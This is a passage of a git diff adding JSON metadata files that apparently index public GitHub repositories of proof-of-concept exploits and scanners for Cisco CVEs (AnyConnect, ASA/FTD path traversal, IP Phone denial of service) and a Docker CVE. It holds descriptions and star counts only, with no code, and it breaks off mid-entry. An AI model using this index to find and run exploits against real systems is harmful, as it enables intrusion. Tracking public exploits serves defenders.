"pushed_at": "2020-05-04T19:34:15Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "anyconnect", + "cve-2020-3153", + "exploit", + "path-transversal" + ], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 264178303, + "name": "CVE-2020-3153", + "full_name": "raspberry-pie\/CVE-2020-3153", + "owner": { + "login": "raspberry-pie", + "id": 20641947, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20641947?v=4", + "html_url": "https:\/\/github.com\/raspberry-pie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/raspberry-pie\/CVE-2020-3153", + "description": "PoC for CVE-2020-3153 Cisco AnyConnect Secure Mobility Client EoP", + "fork": false, + "created_at": "2020-05-15T11:40:02Z", + "updated_at": "2020-05-15T11:42:14Z", + "pushed_at": "2020-05-15T11:42:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 265337436, + "name": "CVE-2020-3153", + "full_name": "goichot\/CVE-2020-3153", + "owner": { + "login": "goichot", + "id": 8002862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8002862?v=4", + "html_url": "https:\/\/github.com\/goichot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/goichot\/CVE-2020-3153", + "description": "Cisco AnyConnect < 4.8.02042 privilege escalation through path traversal", + "fork": false, + "created_at": "2020-05-19T18:59:26Z", + "updated_at": "2024-02-29T10:32:54Z", + "pushed_at": "2020-05-25T08:33:24Z", + "stargazers_count": 104, + "watchers_count": 104, + "has_discussions": false, + "forks_count": 18, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 18, + "watchers": 104, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-3161.json b/2020/CVE-2020-3161.json new file mode 100644 index 0000000000..360442c55c --- /dev/null +++ b/2020/CVE-2020-3161.json @@ -0,0 +1,33 @@ +[ + { + "id": 325827979, + "name": "CVE-2020-3161", + "full_name": "abood05972\/CVE-2020-3161", + "owner": { + "login": "abood05972", + "id": 76751102, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76751102?v=4", + "html_url": "https:\/\/github.com\/abood05972", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/abood05972\/CVE-2020-3161", + "description": "Cisco IP Phone 11.7 - Denial of Service (PoC)", + "fork": false, + "created_at": "2020-12-31T15:37:48Z", + "updated_at": "2021-01-17T15:40:03Z", + "pushed_at": "2020-12-30T23:32:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-3187.json b/2020/CVE-2020-3187.json new file mode 100644 index 0000000000..08b621aa8b --- /dev/null +++ b/2020/CVE-2020-3187.json @@ -0,0 +1,166 @@ +[ + { + "id": 283097598, + "name": "CVE-2020-3187", + "full_name": "CrackerCat\/CVE-2020-3187", + "owner": { + "login": "CrackerCat", + "id": 17995064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4", + "html_url": "https:\/\/github.com\/CrackerCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2020-3187", + "description": null, + "fork": false, + "created_at": "2020-07-28T04:20:17Z", + "updated_at": "2021-05-04T19:34:52Z", + "pushed_at": "2020-07-28T01:13:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 294596627, + "name": "CVE-2020-3187", + "full_name": "1337in\/CVE-2020-3187", + "owner": { + "login": "1337in", + "id": 32819740, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32819740?v=4", + "html_url": "https:\/\/github.com\/1337in", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1337in\/CVE-2020-3187", + "description": null, + "fork": false, + "created_at": "2020-09-11T04:46:59Z", + "updated_at": "2021-05-07T03:51:28Z", + "pushed_at": "2020-09-10T06:34:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 376723994, + "name": "CVE-2020-3187", + "full_name": "sujaygr8\/CVE-2020-3187", + "owner": { + "login": "sujaygr8", + "id": 39243813, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39243813?v=4", + "html_url": "https:\/\/github.com\/sujaygr8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sujaygr8\/CVE-2020-3187", + "description": null, + "fork": false, + "created_at": "2021-06-14T06:27:11Z", + "updated_at": "2021-06-14T06:46:19Z", + "pushed_at": "2021-06-14T06:46:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 613802592, + "name": "CVE-2020-3187-Scanlist", + "full_name": "sunyyer\/CVE-2020-3187-Scanlist", + "owner": { + "login": "sunyyer", + "id": 39803625, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39803625?v=4", + "html_url": "https:\/\/github.com\/sunyyer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sunyyer\/CVE-2020-3187-Scanlist", + "description": "Batch scanning site.", + "fork": false, + "created_at": "2023-03-14T09:54:38Z", + "updated_at": "2023-03-14T09:59:36Z", + "pushed_at": "2023-03-14T10:05:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802826871, + "name": "CVE-2020-3187", + "full_name": "Cappricio-Securities\/CVE-2020-3187", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2020-3187", + "description": "Cisco Adaptive Security Appliance Software\/Cisco Firepower Threat Defense - Directory Traversal", + "fork": false, + "created_at": "2024-05-19T11:32:36Z", + "updated_at": "2024-06-24T07:53:10Z", + "pushed_at": "2024-06-24T07:51:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "asa", + "cisco", + "cve", + "cve-2020-3187", + "ftd", + "pentesting", + "vapt", + "wapt" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-3433.json b/2020/CVE-2020-3433.json new file mode 100644 index 0000000000..f8ec8c9fe4 --- /dev/null +++ b/2020/CVE-2020-3433.json @@ -0,0 +1,33 @@ +[ + { + "id": 298677378, + "name": "CVE-2020-3433", + "full_name": "goichot\/CVE-2020-3433", + "owner": { + "login": "goichot", + "id": 8002862, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8002862?v=4", + "html_url": "https:\/\/github.com\/goichot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/goichot\/CVE-2020-3433", + "description": "PoCs and technical analysis of three vulnerabilities found on Cisco AnyConnect for Windows: CVE-2020-3433, CVE-2020-3434 and CVE-2020-3435 ", + "fork": false, + "created_at": "2020-09-25T20:53:48Z", + "updated_at": "2024-05-10T10:40:17Z", + "pushed_at": "2020-09-25T20:55:17Z", + "stargazers_count": 42, + "watchers_count": 42, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 42, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-3452.json b/2020/CVE-2020-3452.json new file mode 100644 index 0000000000..424a7c3716 --- /dev/null +++ b/2020/CVE-2020-3452.json @@ -0,0 +1,687 @@ +[ + { + "id": 282086490, + "name": "CVE-2020-3452-PoC", + "full_name": "XDev05\/CVE-2020-3452-PoC", + "owner": { + "login": "XDev05", + "id": 55960303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55960303?v=4", + "html_url": "https:\/\/github.com\/XDev05", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XDev05\/CVE-2020-3452-PoC", + "description": null, + "fork": false, + "created_at": "2020-07-24T00:39:11Z", + "updated_at": "2020-09-17T04:12:51Z", + "pushed_at": "2020-07-24T00:49:40Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 282135631, + "name": "cve-2020-3452", + "full_name": "Loneyers\/cve-2020-3452", + "owner": { + "login": "Loneyers", + "id": 29177120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29177120?v=4", + "html_url": "https:\/\/github.com\/Loneyers", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Loneyers\/cve-2020-3452", + "description": "unauth file read in cisco asa & firepower.", + "fork": false, + "created_at": "2020-07-24T05:56:32Z", + "updated_at": "2021-08-14T01:56:21Z", + "pushed_at": "2020-07-24T06:02:19Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 282249421, + "name": "CVE-2020-3452-Cisco-Scanner", + "full_name": "PR3R00T\/CVE-2020-3452-Cisco-Scanner", + "owner": { + "login": "PR3R00T", + "id": 50199640, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50199640?v=4", + "html_url": "https:\/\/github.com\/PR3R00T", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/PR3R00T\/CVE-2020-3452-Cisco-Scanner", + "description": "CVE-2020-3452 Cisco ASA Scanner -unauth Path Traversal Check", + "fork": false, + "created_at": "2020-07-24T15:04:45Z", + "updated_at": "2024-11-26T06:19:54Z", + "pushed_at": "2020-08-30T21:34:41Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 25, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 282267605, + "name": "CVE-2020-3452", + "full_name": "mr-r3b00t\/CVE-2020-3452", + "owner": { + "login": "mr-r3b00t", + "id": 14963690, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14963690?v=4", + "html_url": "https:\/\/github.com\/mr-r3b00t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mr-r3b00t\/CVE-2020-3452", + "description": null, + "fork": false, + "created_at": "2020-07-24T16:26:52Z", + "updated_at": "2024-08-12T20:04:04Z", + "pushed_at": "2020-07-24T17:11:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 282479219, + "name": "CVE-2020-3452", + "full_name": "foulenzer\/CVE-2020-3452", + "owner": { + "login": "foulenzer", + "id": 41641874, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41641874?v=4", + "html_url": "https:\/\/github.com\/foulenzer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/foulenzer\/CVE-2020-3452", + "description": "Little, stupid python validator(?) for CVE-2020-3452 on CISCO devices.", + "fork": false, + "created_at": "2020-07-25T16:11:55Z", + "updated_at": "2020-10-20T14:27:21Z", + "pushed_at": "2020-08-02T16:11:11Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "cisco", + "cve-2020-3452", + "itsec" + ], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 283542069, + "name": "http-vuln-cve2020-3452.nse", + "full_name": "Gh0st0ne\/http-vuln-cve2020-3452.nse", + "owner": { + "login": "Gh0st0ne", + "id": 47971115, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47971115?v=4", + "html_url": "https:\/\/github.com\/Gh0st0ne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Gh0st0ne\/http-vuln-cve2020-3452.nse", + "description": "CVE-2020-3452 : Cisco ASA and FTD Unauthorized Remote File Reading Nmap NSE Script", + "fork": false, + "created_at": "2020-07-29T15:57:26Z", + "updated_at": "2020-07-30T23:54:22Z", + "pushed_at": "2020-10-15T13:42:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 284219767, + "name": "CVE-2020-3452", + "full_name": "0x5ECF4ULT\/CVE-2020-3452", + "owner": { + "login": "0x5ECF4ULT", + "id": 17967646, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17967646?v=4", + "html_url": "https:\/\/github.com\/0x5ECF4ULT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x5ECF4ULT\/CVE-2020-3452", + "description": "CVE-2020-3452 exploit", + "fork": false, + "created_at": "2020-08-01T08:27:11Z", + "updated_at": "2024-07-15T15:03:20Z", + "pushed_at": "2020-08-01T08:59:28Z", + "stargazers_count": 24, + "watchers_count": 24, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 24, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 284677041, + "name": "CVE-2020-3452", + "full_name": "paran0id34\/CVE-2020-3452", + "owner": { + "login": "paran0id34", + "id": 68892986, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68892986?v=4", + "html_url": "https:\/\/github.com\/paran0id34", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paran0id34\/CVE-2020-3452", + "description": "CVE-2020-3452 - directory traversal in Cisco ASA and Cisco Firepower Threat Defense", + "fork": false, + "created_at": "2020-08-03T11:02:23Z", + "updated_at": "2022-07-06T09:55:04Z", + "pushed_at": "2021-06-02T02:44:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 287222475, + "name": "CVE-2020-3452", + "full_name": "murataydemir\/CVE-2020-3452", + "owner": { + "login": "murataydemir", + "id": 16391655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16391655?v=4", + "html_url": "https:\/\/github.com\/murataydemir", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/murataydemir\/CVE-2020-3452", + "description": "[CVE-2020-3452] Cisco Adaptive Security Appliance (ASA) & Cisco Firepower Threat Defense (FTD) Web Service Read-Only Directory Traversal", + "fork": false, + "created_at": "2020-08-13T08:22:27Z", + "updated_at": "2024-08-12T20:04:39Z", + "pushed_at": "2020-09-16T20:50:02Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 291733229, + "name": "Cisco-ASA-LFI", + "full_name": "ludy-dev\/Cisco-ASA-LFI", + "owner": { + "login": "ludy-dev", + "id": 70466565, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70466565?v=4", + "html_url": "https:\/\/github.com\/ludy-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ludy-dev\/Cisco-ASA-LFI", + "description": "(CVE-2020-3452) Cisco Adaptive Security Appliance Software - Local File Inclusion Vuln Test sciript", + "fork": false, + "created_at": "2020-08-31T14:11:19Z", + "updated_at": "2020-11-07T10:00:24Z", + "pushed_at": "2020-11-07T10:00:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 299192944, + "name": "CVE-2020-3452-Exploit", + "full_name": "3ndG4me\/CVE-2020-3452-Exploit", + "owner": { + "login": "3ndG4me", + "id": 14339392, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14339392?v=4", + "html_url": "https:\/\/github.com\/3ndG4me", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3ndG4me\/CVE-2020-3452-Exploit", + "description": "Just basic scanner abusing CVE-2020-3452 to enumerate the standard files accessible in the Web Directory of the CISCO ASA applicances.", + "fork": false, + "created_at": "2020-09-28T05:00:37Z", + "updated_at": "2024-11-26T06:19:59Z", + "pushed_at": "2020-10-10T17:19:51Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bash", + "cisco", + "cve", + "cve-2020-3452", + "exploit", + "hacktoberfest", + "shell", + "vulnerability" + ], + "visibility": "public", + "forks": 11, + "watchers": 25, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 314063056, + "name": "CVE-2020-3452", + "full_name": "grim3\/CVE-2020-3452", + "owner": { + "login": "grim3", + "id": 24641185, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24641185?v=4", + "html_url": "https:\/\/github.com\/grim3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/grim3\/CVE-2020-3452", + "description": "CVE-2020-3452", + "fork": false, + "created_at": "2020-11-18T21:31:50Z", + "updated_at": "2024-08-14T06:19:52Z", + "pushed_at": "2020-11-18T21:45:18Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 321075427, + "name": "CVE-2020-3452", + "full_name": "cygenta\/CVE-2020-3452", + "owner": { + "login": "cygenta", + "id": 49716463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49716463?v=4", + "html_url": "https:\/\/github.com\/cygenta", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cygenta\/CVE-2020-3452", + "description": null, + "fork": false, + "created_at": "2020-12-13T13:47:38Z", + "updated_at": "2024-01-28T18:09:57Z", + "pushed_at": "2022-06-02T20:15:06Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 26, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 327027118, + "name": "CISCO-CVE-2020-3452-Scanner-Exploiter", + "full_name": "darklotuskdb\/CISCO-CVE-2020-3452-Scanner-Exploiter", + "owner": { + "login": "darklotuskdb", + "id": 29382875, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29382875?v=4", + "html_url": "https:\/\/github.com\/darklotuskdb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/darklotuskdb\/CISCO-CVE-2020-3452-Scanner-Exploiter", + "description": "CISCO CVE-2020-3452 Scanner & Exploiter", + "fork": false, + "created_at": "2021-01-05T14:41:13Z", + "updated_at": "2024-08-12T20:09:08Z", + "pushed_at": "2021-07-29T09:28:20Z", + "stargazers_count": 98, + "watchers_count": 98, + "has_discussions": false, + "forks_count": 30, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 30, + "watchers": 98, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 335520796, + "name": "Cisco-ASA-FTD-Web-Services-Traversal", + "full_name": "fuzzlove\/Cisco-ASA-FTD-Web-Services-Traversal", + "owner": { + "login": "fuzzlove", + "id": 44779781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44779781?v=4", + "html_url": "https:\/\/github.com\/fuzzlove", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fuzzlove\/Cisco-ASA-FTD-Web-Services-Traversal", + "description": "CVE-2020-3452 - Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) traversal", + "fork": false, + "created_at": "2021-02-03T05:45:53Z", + "updated_at": "2024-04-25T05:17:46Z", + "pushed_at": "2021-02-03T12:19:16Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "exploit", + "penetration-testing" + ], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 336020236, + "name": "Cisco-CVE-2020-3452-shodan-scanner", + "full_name": "faisalfs10x\/Cisco-CVE-2020-3452-shodan-scanner", + "owner": { + "login": "faisalfs10x", + "id": 51811615, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51811615?v=4", + "html_url": "https:\/\/github.com\/faisalfs10x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/faisalfs10x\/Cisco-CVE-2020-3452-shodan-scanner", + "description": "simple bash script of CVE-2020-3452 Cisco ASA \/ Firepower Read-Only Path Traversal Vulnerability checker ", + "fork": false, + "created_at": "2021-02-04T16:50:27Z", + "updated_at": "2023-04-22T21:34:29Z", + "pushed_at": "2021-02-04T17:38:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-3452", + "exploit", + "poc", + "shodan-dorks" + ], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 375576943, + "name": "CVE-2020-3452", + "full_name": "sujaygr8\/CVE-2020-3452", + "owner": { + "login": "sujaygr8", + "id": 39243813, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39243813?v=4", + "html_url": "https:\/\/github.com\/sujaygr8", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sujaygr8\/CVE-2020-3452", + "description": null, + "fork": false, + "created_at": "2021-06-10T05:09:52Z", + "updated_at": "2021-06-14T07:36:50Z", + "pushed_at": "2021-06-14T07:36:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 424128615, + "name": "CVE-2020-3452", + "full_name": "Aviksaikat\/CVE-2020-3452", + "owner": { + "login": "Aviksaikat", + "id": 31238298, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31238298?v=4", + "html_url": "https:\/\/github.com\/Aviksaikat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Aviksaikat\/CVE-2020-3452", + "description": "Test vulnerability of CVE-2020-3452", + "fork": false, + "created_at": "2021-11-03T07:27:14Z", + "updated_at": "2023-02-06T13:44:50Z", + "pushed_at": "2021-11-03T09:04:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 446508911, + "name": "CVE-2020-3452_auto", + "full_name": "Veids\/CVE-2020-3452_auto", + "owner": { + "login": "Veids", + "id": 13793356, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13793356?v=4", + "html_url": "https:\/\/github.com\/Veids", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Veids\/CVE-2020-3452_auto", + "description": null, + "fork": false, + "created_at": "2022-01-10T16:56:40Z", + "updated_at": "2022-01-10T16:58:25Z", + "pushed_at": "2022-01-10T16:58:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 489632798, + "name": "cve-2020-3452", + "full_name": "iveresk\/cve-2020-3452", + "owner": { + "login": "iveresk", + "id": 28754633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28754633?v=4", + "html_url": "https:\/\/github.com\/iveresk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iveresk\/cve-2020-3452", + "description": "Just proof of concept for Cisco CVE-2020-3452. Using external or internal file base.", + "fork": false, + "created_at": "2022-05-07T09:45:25Z", + "updated_at": "2022-05-07T09:47:56Z", + "pushed_at": "2022-05-07T09:47:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 805701801, + "name": "CVE-2020-3452", + "full_name": "Cappricio-Securities\/CVE-2020-3452", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2020-3452", + "description": "Cisco Adaptive Security Appliance (ASA)\/Firepower Threat Defense (FTD) - Local File Inclusion", + "fork": false, + "created_at": "2024-05-25T08:11:31Z", + "updated_at": "2024-06-24T08:50:19Z", + "pushed_at": "2024-06-24T08:49:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "bugbounty-tool", + "bugbounty-tools", + "cisco", + "cisco-adaptive", + "cve", + "cve-2020-3452", + "cve-2020-3452-exploit", + "cve-2020-3452-poc", + "cve-2020-3452-scanner", + "lfi" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-35191.json b/2020/CVE-2020-35191.json new file mode 100644 index 0000000000..30583ee4b0 --- /dev/null +++ b/2020/CVE-2020-35191.json @@ -0,0 +1,50 @@ +[ + { + "id": 441536984, + "name": "MegaHiDocker", + "full_name": "megadimenex\/MegaHiDocker", + "owner": { + "login": "megadimenex", + "id": 96182749, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96182749?v=4", + "html_url": "https:\/\/github.com\/megadimenex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/megadimenex\/MegaHiDocker", + "description": "This project is exploit for some docker containers with similar to vulnerability code: CVE-2020-35191", + "fork": false, + "created_at": "2021-12-24T18:59:31Z", + "updated_at": "2021-12-29T12:23:10Z", + "pushed_at": "2021-12-29T12:21:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "alertmanager", + "authentication", + "bitnami", + "cassandra", + "cve", + "docker", + "exploit", + "geode", + "kasm", + "nvidia", + "phppgadmin", + "privilege-escalation", + "prometheus", + "root", + "security", + "solr" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-35262.json b/2020/CVE-2020-35262.json new file mode 100644 index 0000000000..3f700aae31 --- /dev/null +++ b/2020/CVE-2020-35262.json @@ -0,0 +1,33 @@ +[ + { + "id": 327099437, + "name": "CVE-2020-35262", + "full_name": "the-girl-who-lived\/CVE-2020-35262", + "owner": { + "login": "the-girl-who-lived", + "id": 42164898, + "avatar_url": 